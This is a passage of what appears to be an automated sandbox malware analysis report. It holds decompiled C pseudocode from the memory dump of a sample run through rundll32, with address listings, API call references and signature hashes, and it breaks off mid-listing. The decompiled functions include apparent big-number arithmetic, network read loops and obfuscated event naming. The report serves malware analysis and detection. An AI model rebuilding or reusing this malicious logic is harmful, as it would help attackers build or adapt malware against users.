					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4fdc298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4fdd2a4; // 0x254a5a8
												_t28 = _t109 + 0x4fde0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4fdd2a4; // 0x254a5a8
														_t33 = _t79 + 0x4fde078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                          0x04fd91ba
                                          0x04fd91c3
                                          0x04fd91c4
                                          0x04fd91c8
                                          0x04fd91ce
                                          0x04fd91d4
                                          0x04fd91dd
                                          0x04fd91e3
                                          0x04fd91ed
                                          0x04fd91ef
                                          0x04fd91f5
                                          0x04fd91fa
                                          0x04fd9205
                                          0x04fd920b
                                          0x04fd9210
                                          0x04fd9332
                                          0x04fd9216
                                          0x04fd9216
                                          0x04fd9223
                                          0x04fd9229
                                          0x04fd922f
                                          0x04fd9233
                                          0x04fd9239
                                          0x04fd9246
                                          0x04fd924a
                                          0x04fd9250
                                          0x04fd9253
                                          0x04fd925b
                                          0x04fd925c
                                          0x04fd9260
                                          0x04fd9264
                                          0x04fd9267
                                          0x04fd926a
                                          0x04fd9270
                                          0x04fd9279
                                          0x04fd927f
                                          0x04fd9280
                                          0x04fd9283
                                          0x04fd9284
                                          0x04fd9285
                                          0x04fd928d
                                          0x04fd928e
                                          0x04fd928f
                                          0x04fd9291
                                          0x04fd9295
                                          0x04fd9299
                                          0x00000000
                                          0x00000000
                                          0x04fd929f
                                          0x04fd92a8
                                          0x04fd92ae
                                          0x04fd92b8
                                          0x04fd92bc
                                          0x04fd92be
                                          0x04fd92cb
                                          0x04fd92cf
                                          0x04fd92d7
                                          0x04fd92dc
                                          0x04fd92ee
                                          0x04fd92f0
                                          0x04fd92f6
                                          0x04fd92f6
                                          0x04fd92ff
                                          0x04fd92ff
                                          0x04fd9301
                                          0x04fd9307
                                          0x04fd9307
                                          0x04fd930a
                                          0x04fd9310
                                          0x04fd9313
                                          0x04fd931c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd931c
                                          0x04fd9270
                                          0x04fd926a
                                          0x04fd9253
                                          0x04fd9322
                                          0x04fd9322
                                          0x04fd9328
                                          0x04fd9328
                                          0x04fd932e
                                          0x04fd932e
                                          0x04fd9337
                                          0x04fd933d
                                          0x04fd933d
                                          0x04fd91fa
                                          0x04fd9346

                                          APIs
                                          • SysAllocString.OLEAUT32(04FDC298), ref: 04FD9205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04FD92E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD92FF
                                          • SysFreeString.OLEAUT32(?), ref: 04FD932E
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: bf1a47ee0dbbdee8045df2f475f6953229c618f79ca5e7b7c26bfb64dbd45492
                                          • Instruction ID: 2917919b929f9a03aeded2e6b8474f17ed82a29f9a450320907398872e257e43
                                          • Opcode Fuzzy Hash: bf1a47ee0dbbdee8045df2f475f6953229c618f79ca5e7b7c26bfb64dbd45492
                                          • Instruction Fuzzy Hash: E0513075D00519EFCB00DFE8C888DAEB7BAFF89705B144598E915EB260D771AD42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD7664, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E04FD7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04FD48F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04FD748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04FD7074(_t101,  &_v236, _a8, _t96 - _t81);
					E04FD7074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04FD748A(_t101, 0x4fdd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04FD748A(_a16, _a4);
						E04FD2FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04FDB088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04FDB082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04FD6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04FD15CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04FD687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4fdd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                          0x04fd7667
                                          0x04fd7673
                                          0x04fd7679
                                          0x04fd767e
                                          0x04fd7682
                                          0x04fd77df
                                          0x04fd77e3
                                          0x04fd77e3
                                          0x04fd7688
                                          0x04fd768c
                                          0x04fd7690
                                          0x04fd7693
                                          0x04fd769e
                                          0x04fd76a4
                                          0x04fd76a9
                                          0x04fd76ac
                                          0x04fd76c6
                                          0x04fd76d2
                                          0x04fd76db
                                          0x04fd76e5
                                          0x04fd76ea
                                          0x04fd76ec
                                          0x04fd76ef
                                          0x04fd779d
                                          0x04fd77a3
                                          0x04fd77b4
                                          0x04fd77c7
                                          0x04fd77d7
                                          0x00000000
                                          0x04fd77dc
                                          0x04fd76f8
                                          0x04fd76ff
                                          0x04fd7703
                                          0x04fd7709
                                          0x04fd770b
                                          0x04fd770d
                                          0x04fd770f
                                          0x04fd7711
                                          0x04fd771b
                                          0x04fd7720
                                          0x04fd7722
                                          0x04fd7724
                                          0x04fd7725
                                          0x04fd7726
                                          0x04fd7727
                                          0x04fd772e
                                          0x04fd7735
                                          0x04fd7738
                                          0x04fd7738
                                          0x04fd7705
                                          0x04fd7705
                                          0x04fd7705
                                          0x04fd7740
                                          0x04fd7748
                                          0x04fd7751
                                          0x04fd7756
                                          0x04fd7756
                                          0x04fd775b
                                          0x00000000
                                          0x00000000
                                          0x04fd775d
                                          0x04fd7760
                                          0x04fd776a
                                          0x00000000
                                          0x00000000
                                          0x04fd776c
                                          0x04fd776c
                                          0x04fd7776
                                          0x04fd7756
                                          0x04fd775b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd775b
                                          0x04fd7780
                                          0x04fd7783
                                          0x04fd7786
                                          0x04fd778d
                                          0x04fd778d
                                          0x04fd779a
                                          0x00000000
                                          0x04fd779a
                                          0x04fd7695
                                          0x04fd7699
                                          0x04fd769a
                                          0x04fd769c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd769c
                                          0x00000000

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04FD7711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04FD7727
                                          • memset.NTDLL ref: 04FD77C7
                                          • memset.NTDLL ref: 04FD77D7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 973003e502924501e212cfe42879ab5c0bf7179af9717e901f0f14ec652f945e
                                          • Instruction ID: e1215baa0a9dc4a0c71190e450f5953609871bed50de0f15bc2162cbe42f97fb
                                          • Opcode Fuzzy Hash: 973003e502924501e212cfe42879ab5c0bf7179af9717e901f0f14ec652f945e
                                          • Instruction Fuzzy Hash: 26419931A00259ABEB10FFA8CC44BDE77B6EF45314F144529F915AB180E771BD568B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDA96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04FDA97E
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • ResetEvent.KERNEL32(?), ref: 04FDA9F2
                                          • GetLastError.KERNEL32 ref: 04FDAA15
                                          • GetLastError.KERNEL32 ref: 04FDAAC0
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 98b2de14c2e10071e31af14266d96aa296b7490abd4cd07be7d01369006d6b77
                                          • Instruction ID: 3f32ee0b0f60819cc9cc931457b5865b6f77126fe0643ee92312532067f5ab61
                                          • Opcode Fuzzy Hash: 98b2de14c2e10071e31af14266d96aa296b7490abd4cd07be7d01369006d6b77
                                          • Instruction Fuzzy Hash: 97418175900608FFE731AFB1DD48E5B7BBFEB49700B184A19F542D1090D735A905DB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD8F08, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04FD8F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x4fdd138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4fdd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04FD58BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x4fdd138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04FD147E(_v16);
							if(_t58 == 0) {
								_t58 = E04FD16DB(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04FD9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04FD9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                          0x04fd8f17
                                          0x04fd8f1c
                                          0x04fd8f1e
                                          0x04fd8f23
                                          0x04fd8f24
                                          0x04fd8f29
                                          0x04fd8f2a
                                          0x04fd8f35
                                          0x04fd8f66
                                          0x04fd8f6b
                                          0x04fd902e
                                          0x04fd9031
                                          0x04fd9037
                                          0x04fd9037
                                          0x04fd8f78
                                          0x04fd8f80
                                          0x04fd902b
                                          0x00000000
                                          0x04fd902b
                                          0x04fd8f8b
                                          0x04fd8f90
                                          0x04fd8f95
                                          0x04fd901d
                                          0x04fd901e
                                          0x04fd901e
                                          0x04fd9024
                                          0x00000000
                                          0x04fd9024
                                          0x04fd8f9b
                                          0x04fd8f9d
                                          0x04fd8fa3
                                          0x04fd8fa4
                                          0x04fd8fa4
                                          0x04fd8fa7
                                          0x04fd8faa
                                          0x04fd8fb0
                                          0x04fd8fb5
                                          0x04fd8fb6
                                          0x04fd8fbb
                                          0x04fd8fbe
                                          0x04fd8fc9
                                          0x00000000
                                          0x00000000
                                          0x04fd8fd1
                                          0x04fd8fd9
                                          0x04fd9002
                                          0x04fd9005
                                          0x04fd900c
                                          0x04fd9017
                                          0x04fd9017
                                          0x00000000
                                          0x04fd900c
                                          0x04fd8fe5
                                          0x04fd8fe9
                                          0x00000000
                                          0x00000000
                                          0x04fd8feb
                                          0x04fd8ff0
                                          0x00000000
                                          0x00000000
                                          0x04fd8ff2
                                          0x04fd8ff2
                                          0x04fd8ff7
                                          0x00000000
                                          0x00000000
                                          0x04fd8ff9
                                          0x04fd8ffa
                                          0x04fd8ffd
                                          0x04fd8ffd
                                          0x04fd8fa4
                                          0x04fd8f3d
                                          0x04fd8f45
                                          0x04fd8f5e
                                          0x04fd8f60
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd8f60
                                          0x04fd8f51
                                          0x04fd8f55
                                          0x00000000
                                          0x00000000
                                          0x04fd8f5b
                                          0x00000000

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04FD8F1E
                                          • GetLastError.KERNEL32 ref: 04FD8F37
                                            • Part of subcall function 04FD9D3A: WaitForMultipleObjects.KERNEL32(00000002,04FDAA33,00000000,04FDAA33,?,?,?,04FDAA33,0000EA60), ref: 04FD9D55
                                          • ResetEvent.KERNEL32(?), ref: 04FD8FB0
                                          • GetLastError.KERNEL32 ref: 04FD8FCB
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 45ff3e494c9265dbf8aab565fb0bae2d0d15c58e5d5a123e2a216df5f4430f5b
                                          • Instruction ID: 189da97ec73befe58fedad1f7d9e29592e7a6e02d8191e0961dad44db7afe530
                                          • Opcode Fuzzy Hash: 45ff3e494c9265dbf8aab565fb0bae2d0d15c58e5d5a123e2a216df5f4430f5b
                                          • Instruction Fuzzy Hash: E6318672A00604ABDB21AFF4DC48E5E77BBEF88354F180568E555D7190EBB0F9479710
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD72F2, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E04FD72F2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4fdd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4fdd2a4; // 0x254a5a8
				_t3 = _t8 + 0x4fde836; // 0x61636f4c
				_t25 = 0;
				_t30 = E04FD6AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4fdd2a8, 1, 0, _t30);
					E04FD147E(_t30);
				}
				_t12 =  *0x4fdd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04FD56A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04FD1493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4fdd110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04FD7827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x04fd72f3
                                          0x04fd72fa
                                          0x04fd7304
                                          0x04fd7308
                                          0x04fd730e
                                          0x04fd731d
                                          0x04fd7324
                                          0x04fd7328
                                          0x04fd733a
                                          0x04fd733c
                                          0x04fd733c
                                          0x04fd7341
                                          0x04fd7348
                                          0x04fd739f
                                          0x04fd739f
                                          0x04fd73a5
                                          0x04fd73a7
                                          0x04fd73a7
                                          0x04fd73b1
                                          0x04fd73b5
                                          0x04fd73c7
                                          0x04fd73c7
                                          0x04fd73cb
                                          0x04fd73d1
                                          0x04fd73d1
                                          0x00000000
                                          0x04fd7361
                                          0x04fd7366
                                          0x04fd736e
                                          0x04fd7372
                                          0x04fd7376
                                          0x04fd7376
                                          0x04fd7383
                                          0x04fd7387
                                          0x04fd738b
                                          0x04fd73e0
                                          0x04fd73e6
                                          0x04fd73e6
                                          0x04fd7399
                                          0x04fd739d
                                          0x04fd73d4
                                          0x04fd73d6
                                          0x04fd73d9
                                          0x04fd73d9
                                          0x00000000
                                          0x04fd73d6
                                          0x04fd739d
                                          0x00000000
                                          0x04fd7387

                                          APIs
                                            • Part of subcall function 04FD6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04FD2098,74666F53,00000000,?,04FDD00C,?,?), ref: 04FD6B2D
                                            • Part of subcall function 04FD6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6B51
                                            • Part of subcall function 04FD6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04FD6B59
                                          • CreateEventA.KERNEL32(04FDD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04FD555B,?,?,?), ref: 04FD7333
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04FD555B,00000000,00000000,?,00000000,?,04FD555B,?,?,?), ref: 04FD7393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04FD555B,?,?,?), ref: 04FD73C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04FD555B,?,?,?), ref: 04FD73D9
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 0f3a824b298cf2e6f4937cb8a77667efe86a2577b4ebb741e35144432500eda7
                                          • Instruction ID: 8ade631b3973b564e3c78353e47802f23d26f52224007bdb2e5753cd45bd7bd8
                                          • Opcode Fuzzy Hash: 0f3a824b298cf2e6f4937cb8a77667efe86a2577b4ebb741e35144432500eda7
                                          • Instruction Fuzzy Hash: E021F032A012869BDB317EB8AC84A6B73DBEB88715B0D0634FD52DF144DB64EC028690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDA1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E04FDA1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4fdd140; // 0x4fdad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04FD58BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04FD147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04FD9D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x04fda1f1
                                          0x04fda1f1
                                          0x04fda1fb
                                          0x04fda201
                                          0x04fda204
                                          0x04fda208
                                          0x04fda20e
                                          0x04fda213
                                          0x04fda22c
                                          0x04fda22f
                                          0x04fda233
                                          0x04fda237
                                          0x04fda238
                                          0x04fda23d
                                          0x04fda240
                                          0x04fda247
                                          0x04fda24e
                                          0x04fda2a1
                                          0x04fda2a7
                                          0x04fda2ad
                                          0x04fda2e8
                                          0x04fda2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fda2ad
                                          0x04fda254
                                          0x00000000
                                          0x04fda25b
                                          0x04fda269
                                          0x04fda26c
                                          0x04fda26f
                                          0x04fda27b
                                          0x04fda27f
                                          0x04fda2e1
                                          0x04fda281
                                          0x04fda284
                                          0x04fda288
                                          0x04fda289
                                          0x04fda28a
                                          0x04fda28c
                                          0x04fda293
                                          0x04fda2d1
                                          0x04fda2dc
                                          0x04fda295
                                          0x04fda298
                                          0x04fda29c
                                          0x04fda29c
                                          0x04fda293
                                          0x00000000
                                          0x04fda27f
                                          0x04fda254
                                          0x04fda218
                                          0x04fda21e
                                          0x04fda221
                                          0x04fda226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fda2b6
                                          0x04fda2be
                                          0x04fda2c3
                                          0x04fda2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04FDA208
                                          • SetEvent.KERNEL32(?), ref: 04FDA218
                                          • GetLastError.KERNEL32 ref: 04FDA2A1
                                            • Part of subcall function 04FD9D3A: WaitForMultipleObjects.KERNEL32(00000002,04FDAA33,00000000,04FDAA33,?,?,?,04FDAA33,0000EA60), ref: 04FD9D55
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • GetLastError.KERNEL32(00000000), ref: 04FDA2D6
